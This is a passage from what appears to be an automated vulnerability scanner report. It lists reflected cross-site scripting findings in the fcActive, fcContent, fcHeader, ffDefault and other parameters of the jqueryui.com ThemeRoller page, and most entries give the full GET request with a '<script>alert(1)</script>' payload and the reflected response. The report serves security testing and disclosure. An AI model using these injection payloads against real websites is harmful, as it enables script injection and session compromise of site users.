TopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px1e89a"><script>alert(1)</script>6b39fffa270 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:34:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px1e89a"><script>alert(1)</script>6b39fffa270" type="text/css" media="all" />
...[SNIP]...

1.37. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8ed"><script>alert(1)</script>95358923f11 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121be8ed"><script>alert(1)</script>95358923f11&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121be8ed"><script>alert(1)</script>95358923f11&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTe
...[SNIP]...

1.38. http://jqueryui.com/themeroller/ [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a27a"><script>alert(1)</script>10d27831cca was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=0101019a27a"><script>alert(1)</script>10d27831cca&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=0101019a27a"><script>alert(1)</script>10d27831cca&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=
...[SNIP]...

1.39. http://jqueryui.com/themeroller/ [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605a3"><script>alert(1)</script>449b4443c2d was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555605a3"><script>alert(1)</script>449b4443c2d&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555605a3"><script>alert(1)</script>449b4443c2d&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.p
...[SNIP]...

1.40. http://jqueryui.com/themeroller/ [fcError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0b2e"><script>alert(1)</script>ab77fccbd26 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203ec0b2e"><script>alert(1)</script>ab77fccbd26&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:31:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203ec0b2e"><script>alert(1)</script>ab77fccbd26&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

1.41. http://jqueryui.com/themeroller/ [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8678d"><script>alert(1)</script>afc432a7bb6 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=0101018678d"><script>alert(1)</script>afc432a7bb6&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=0101018678d"><script>alert(1)</script>afc432a7bb6&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefaul
...[SNIP]...

1.42. http://jqueryui.com/themeroller/ [fcHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9fd"><script>alert(1)</script>f5ecfc6aec0 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636cc9fd"><script>alert(1)</script>f5ecfc6aec0&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:30:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tyActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636cc9fd"><script>alert(1)</script>f5ecfc6aec0&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fla
...[SNIP]...

1.43. http://jqueryui.com/themeroller/ [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ef8"><script>alert(1)</script>5eda88eabce was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121b4ef8"><script>alert(1)</script>5eda88eabce&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121b4ef8"><script>alert(1)</script>5eda88eabce&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=
...[SNIP]...

1.44. http://jqueryui.com/themeroller/ [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa395"><script>alert(1)</script>0fa87626802 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-seriffa395"><script>alert(1)</script>0fa87626802&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:23:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-seriffa395"><script>alert(1)</script>0fa87626802&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColor
...[SNIP]...

1.45. http://jqueryui.com/themeroller/ [fsDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 286af"><script>alert(1)</script>fa88153198a was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px286af"><script>alert(1)</script>fa88153198a&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px286af"><script>alert(1)</script>fa88153198a&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=
...[SNIP]...

1.46. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26e8b"><script>alert(1)</script>2e205dee113 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

